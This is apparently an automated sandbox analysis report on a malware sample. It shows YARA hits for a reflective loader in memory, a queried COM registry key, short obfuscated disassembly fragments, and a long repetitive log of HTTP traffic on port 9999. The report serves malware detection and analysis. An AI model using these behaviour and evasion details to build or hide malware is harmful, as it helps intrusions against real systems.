Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Data Obfuscation

Yara detected ReflectiveLoader

Source: Yara match	File source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D96BD4 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,FreeLibrary,

0_2_03D96BD4

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D8C35C push 9403D8C3h; ret	0_2_03D8C361
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D99B73 push 0000006Ah; retf	0_2_03D99BE4
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D99B75 push 0000006Ah; retf	0_2_03D99BE4
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D99B0B push 0000006Ah; retf	0_2_03D99BE4
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D88221 push ecx; ret	0_2_03D88234
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03984112 push edi; ret	0_2_03984113
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0398583E push dword ptr [ecx-75h]; iretd	0_2_03985846
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0398B7AA push 941001C3h; ret	0_2_0398B7AF
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0398766F push ecx; ret	0_2_03987682

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 57241 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57241
Source: unknown	Network traffic detected: HTTP traffic on port 57242 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57242
Source: unknown	Network traffic detected: HTTP traffic on port 57243 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57243
Source: unknown	Network traffic detected: HTTP traffic on port 57244 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57244
Source: unknown	Network traffic detected: HTTP traffic on port 57245 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57245
Source: unknown	Network traffic detected: HTTP traffic on port 57246 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57246
Source: unknown	Network traffic detected: HTTP traffic on port 57247 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57247
Source: unknown	Network traffic detected: HTTP traffic on port 57248 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57248
Source: unknown	Network traffic detected: HTTP traffic on port 57249 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57249
Source: unknown	Network traffic detected: HTTP traffic on port 57250 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57250
Source: unknown	Network traffic detected: HTTP traffic on port 57251 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57251
Source: unknown	Network traffic detected: HTTP traffic on port 57252 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57252
Source: unknown	Network traffic detected: HTTP traffic on port 57253 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57253
Source: unknown	Network traffic detected: HTTP traffic on port 57254 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57254
Source: unknown	Network traffic detected: HTTP traffic on port 57255 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57255
Source: unknown	Network traffic detected: HTTP traffic on port 57256 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57256
Source: unknown	Network traffic detected: HTTP traffic on port 57257 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57257
Source: unknown	Network traffic detected: HTTP traffic on port 57258 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57258
Source: unknown	Network traffic detected: HTTP traffic on port 57259 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57259
Source: unknown	Network traffic detected: HTTP traffic on port 57260 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57260
Source: unknown	Network traffic detected: HTTP traffic on port 57261 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57261
Source: unknown	Network traffic detected: HTTP traffic on port 57262 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57262
Source: unknown	Network traffic detected: HTTP traffic on port 57263 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57263
Source: unknown	Network traffic detected: HTTP traffic on port 57264 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57264
Source: unknown	Network traffic detected: HTTP traffic on port 57265 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57265
Source: unknown	Network traffic detected: HTTP traffic on port 54000 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54000
Source: unknown	Network traffic detected: HTTP traffic on port 54001 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54001
Source: unknown	Network traffic detected: HTTP traffic on port 54002 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54002
Source: unknown	Network traffic detected: HTTP traffic on port 54003 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54003
Source: unknown	Network traffic detected: HTTP traffic on port 54004 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54004
Source: unknown	Network traffic detected: HTTP traffic on port 54005 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54005
Source: unknown	Network traffic detected: HTTP traffic on port 54006 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54006
Source: unknown	Network traffic detected: HTTP traffic on port 54007 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54007
Source: unknown	Network traffic detected: HTTP traffic on port 54008 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54008
Source: unknown	Network traffic detected: HTTP traffic on port 54009 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54009
Source: unknown	Network traffic detected: HTTP traffic on port 54011 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54011
Source: unknown	Network traffic detected: HTTP traffic on port 54012 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54012
Source: unknown	Network traffic detected: HTTP traffic on port 54022 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54022
Source: unknown	Network traffic detected: HTTP traffic on port 54029 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54029
Source: unknown	Network traffic detected: HTTP traffic on port 54035 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54035
Source: unknown	Network traffic detected: HTTP traffic on port 54046 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54046
Source: unknown	Network traffic detected: HTTP traffic on port 54052 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54052
Source: unknown	Network traffic detected: HTTP traffic on port 54058 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54058
Source: unknown	Network traffic detected: HTTP traffic on port 54067 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54067
Source: unknown	Network traffic detected: HTTP traffic on port 54075 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54075
Source: unknown	Network traffic detected: HTTP traffic on port 54076 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54076
Source: unknown	Network traffic detected: HTTP traffic on port 54087 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54087
Source: unknown	Network traffic detected: HTTP traffic on port 54093 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54093
Source: unknown	Network traffic detected: HTTP traffic on port 54099 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54099
Source: unknown	Network traffic detected: HTTP traffic on port 54110 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54110
Source: unknown	Network traffic detected: HTTP traffic on port 54116 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54116
Source: unknown	Network traffic detected: HTTP traffic on port 54123 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54123
Source: unknown	Network traffic detected: HTTP traffic on port 54132 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54132
Source: unknown	Network traffic detected: HTTP traffic on port 54137 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54137
Source: unknown	Network traffic detected: HTTP traffic on port 54141 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54141
Source: unknown	Network traffic detected: HTTP traffic on port 54147 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54147
Source: unknown	Network traffic detected: HTTP traffic on port 54151 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54151
Source: unknown	Network traffic detected: HTTP traffic on port 54157 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54157
Source: unknown	Network traffic detected: HTTP traffic on port 54167 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54167
Source: unknown	Network traffic detected: HTTP traffic on port 54174 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54174
Source: unknown	Network traffic detected: HTTP traffic on port 54180 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54180
Source: unknown	Network traffic detected: HTTP traffic on port 54190 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54190
Source: unknown	Network traffic detected: HTTP traffic on port 54197 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54197
Source: unknown	Network traffic detected: HTTP traffic on port 54203 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54203
Source: unknown	Network traffic detected: HTTP traffic on port 54209 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54209
Source: unknown	Network traffic detected: HTTP traffic on port 54220 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54220
Source: unknown	Network traffic detected: HTTP traffic on port 54226 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54226
Source: unknown	Network traffic detected: HTTP traffic on port 54235 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54235
Source: unknown	Network traffic detected: HTTP traffic on port 54241 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54241
Source: unknown	Network traffic detected: HTTP traffic on port 54249 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54249
Source: unknown	Network traffic detected: HTTP traffic on port 54255 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54255
Source: unknown	Network traffic detected: HTTP traffic on port 54264 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54264
Source: unknown	Network traffic detected: HTTP traffic on port 54271 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54271
Source: unknown	Network traffic detected: HTTP traffic on port 54278 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54278
Source: unknown	Network traffic detected: HTTP traffic on port 54287 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54287
Source: unknown	Network traffic detected: HTTP traffic on port 54295 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54295
Source: unknown	Network traffic detected: HTTP traffic on port 54301 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54301
Source: unknown	Network traffic detected: HTTP traffic on port 54310 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54310
Source: unknown	Network traffic detected: HTTP traffic on port 54318 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54318
Source: unknown	Network traffic detected: HTTP traffic on port 54319 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54319
Source: unknown	Network traffic detected: HTTP traffic on port 54320 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54320
Source: unknown	Network traffic detected: HTTP traffic on port 54321 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54321
Source: unknown	Network traffic detected: HTTP traffic on port 54322 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54322
Source: unknown	Network traffic detected: HTTP traffic on port 54323 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54323
Source: unknown	Network traffic detected: HTTP traffic on port 54324 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54324
Source: unknown	Network traffic detected: HTTP traffic on port 54325 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54325
Source: unknown	Network traffic detected: HTTP traffic on port 54326 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54326
Source: unknown	Network traffic detected: HTTP traffic on port 54327 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54327
Source: unknown	Network traffic detected: HTTP traffic on port 54328 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54328
Source: unknown	Network traffic detected: HTTP traffic on port 54329 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54329
Source: unknown	Network traffic detected: HTTP traffic on port 54330 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54330
Source: unknown	Network traffic detected: HTTP traffic on port 54331 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54331
Source: unknown	Network traffic detected: HTTP traffic on port 54332 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54332
Source: unknown	Network traffic detected: HTTP traffic on port 54333 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54333
Source: unknown	Network traffic detected: HTTP traffic on port 54334 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54334
Source: unknown	Network traffic detected: HTTP traffic on port 54335 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54335
Source: unknown	Network traffic detected: HTTP traffic on port 54336 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54336
Source: unknown	Network traffic detected: HTTP traffic on port 54337 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54337
Source: unknown	Network traffic detected: HTTP traffic on port 54338 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54338
Source: unknown	Network traffic detected: HTTP traffic on port 54339 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54339
Source: unknown	Network traffic detected: HTTP traffic on port 54340 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54340
Source: unknown	Network traffic detected: HTTP traffic on port 54341 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54341
Source: unknown	Network traffic detected: HTTP traffic on port 54342 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54342
Source: unknown	Network traffic detected: HTTP traffic on port 54343 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54343
Source: unknown	Network traffic detected: HTTP traffic on port 54344 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54344
Source: unknown	Network traffic detected: HTTP traffic on port 54345 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54345
Source: unknown	Network traffic detected: HTTP traffic on port 54346 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54346
Source: unknown	Network traffic detected: HTTP traffic on port 54347 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54347
Source: unknown	Network traffic detected: HTTP traffic on port 54348 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54348
Source: unknown	Network traffic detected: HTTP traffic on port 54349 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54349
Source: unknown	Network traffic detected: HTTP traffic on port 54350 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54350
Source: unknown	Network traffic detected: HTTP traffic on port 54351 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54351
Source: unknown	Network traffic detected: HTTP traffic on port 54352 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54352
Source: unknown	Network traffic detected: HTTP traffic on port 54353 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54353
Source: unknown	Network traffic detected: HTTP traffic on port 54354 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54354
Source: unknown	Network traffic detected: HTTP traffic on port 54355 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54355
Source: unknown	Network traffic detected: HTTP traffic on port 54356 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54356
Source: unknown	Network traffic detected: HTTP traffic on port 54357 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54357
Source: unknown	Network traffic detected: HTTP traffic on port 54358 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54358
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54358
Source: unknown	Network traffic detected: HTTP traffic on port 54359 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54359
Source: unknown	Network traffic detected: HTTP traffic on port 54360 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54360
Source: unknown	Network traffic detected: HTTP traffic on port 54361 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54361
Source: unknown	Network traffic detected: HTTP traffic on port 54362 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54362
Source: unknown	Network traffic detected: HTTP traffic on port 54363 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54363
Source: unknown	Network traffic detected: HTTP traffic on port 54364 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54364
Source: unknown	Network traffic detected: HTTP traffic on port 54365 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54365
Source: unknown	Network traffic detected: HTTP traffic on port 54366 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54366
Source: unknown	Network traffic detected: HTTP traffic on port 54367 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54367
Source: unknown	Network traffic detected: HTTP traffic on port 54368 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54368
Source: unknown	Network traffic detected: HTTP traffic on port 54369 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54369
Source: unknown	Network traffic detected: HTTP traffic on port 54370 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54370
Source: unknown	Network traffic detected: HTTP traffic on port 54371 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54371
Source: unknown	Network traffic detected: HTTP traffic on port 54372 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54372
Source: unknown	Network traffic detected: HTTP traffic on port 54373 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54373
Source: unknown	Network traffic detected: HTTP traffic on port 54374 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54374
Source: unknown	Network traffic detected: HTTP traffic on port 54375 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54375
Source: unknown	Network traffic detected: HTTP traffic on port 54376 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54376
Source: unknown	Network traffic detected: HTTP traffic on port 54377 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54377
Source: unknown	Network traffic detected: HTTP traffic on port 54378 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54378
Source: unknown	Network traffic detected: HTTP traffic on port 54379 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54379
Source: unknown	Network traffic detected: HTTP traffic on port 54380 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54380
Source: unknown	Network traffic detected: HTTP traffic on port 54381 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54381
Source: unknown	Network traffic detected: HTTP traffic on port 54382 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54382
Source: unknown	Network traffic detected: HTTP traffic on port 54383 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54383
Source: unknown	Network traffic detected: HTTP traffic on port 54384 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54384
Source: unknown	Network traffic detected: HTTP traffic on port 54385 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54385
Source: unknown	Network traffic detected: HTTP traffic on port 54386 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54386
Source: unknown	Network traffic detected: HTTP traffic on port 54387 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54387
Source: unknown	Network traffic detected: HTTP traffic on port 54388 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54388
Source: unknown	Network traffic detected: HTTP traffic on port 54389 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54389
Source: unknown	Network traffic detected: HTTP traffic on port 54390 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54390
Source: unknown	Network traffic detected: HTTP traffic on port 54391 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54391
Source: unknown	Network traffic detected: HTTP traffic on port 54392 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54392
Source: unknown	Network traffic detected: HTTP traffic on port 54393 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54393
Source: unknown	Network traffic detected: HTTP traffic on port 54394 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54394
Source: unknown	Network traffic detected: HTTP traffic on port 54395 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54395
Source: unknown	Network traffic detected: HTTP traffic on port 54396 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54396
Source: unknown	Network traffic detected: HTTP traffic on port 54397 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54397
Source: unknown	Network traffic detected: HTTP traffic on port 54398 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54398
Source: unknown	Network traffic detected: HTTP traffic on port 54399 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54399
Source: unknown	Network traffic detected: HTTP traffic on port 54400 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54400
Source: unknown	Network traffic detected: HTTP traffic on port 54401 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54401
Source: unknown	Network traffic detected: HTTP traffic on port 54402 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54402
Source: unknown	Network traffic detected: HTTP traffic on port 54403 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54403
Source: unknown	Network traffic detected: HTTP traffic on port 54404 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54404
Source: unknown	Network traffic detected: HTTP traffic on port 54405 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54405
Source: unknown	Network traffic detected: HTTP traffic on port 54406 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54406
Source: unknown	Network traffic detected: HTTP traffic on port 54407 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54407
Source: unknown	Network traffic detected: HTTP traffic on port 54408 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54408
Source: unknown	Network traffic detected: HTTP traffic on port 54409 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54409
Source: unknown	Network traffic detected: HTTP traffic on port 54410 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54410
Source: unknown	Network traffic detected: HTTP traffic on port 54411 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54411
Source: unknown	Network traffic detected: HTTP traffic on port 54412 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54412
Source: unknown	Network traffic detected: HTTP traffic on port 54413 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54413
Source: unknown	Network traffic detected: HTTP traffic on port 54414 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54414
Source: unknown	Network traffic detected: HTTP traffic on port 54415 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54415
Source: unknown	Network traffic detected: HTTP traffic on port 54416 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54416
Source: unknown	Network traffic detected: HTTP traffic on port 54417 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54417
Source: unknown	Network traffic detected: HTTP traffic on port 54418 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54418
Source: unknown	Network traffic detected: HTTP traffic on port 54419 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54419
Source: unknown	Network traffic detected: HTTP traffic on port 54420 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54420
Source: unknown	Network traffic detected: HTTP traffic on port 54421 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54421
Source: unknown	Network traffic detected: HTTP traffic on port 54422 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 54422
Source: unknown	Network traffic detected: HTTP traffic on port 54423 -> 9999
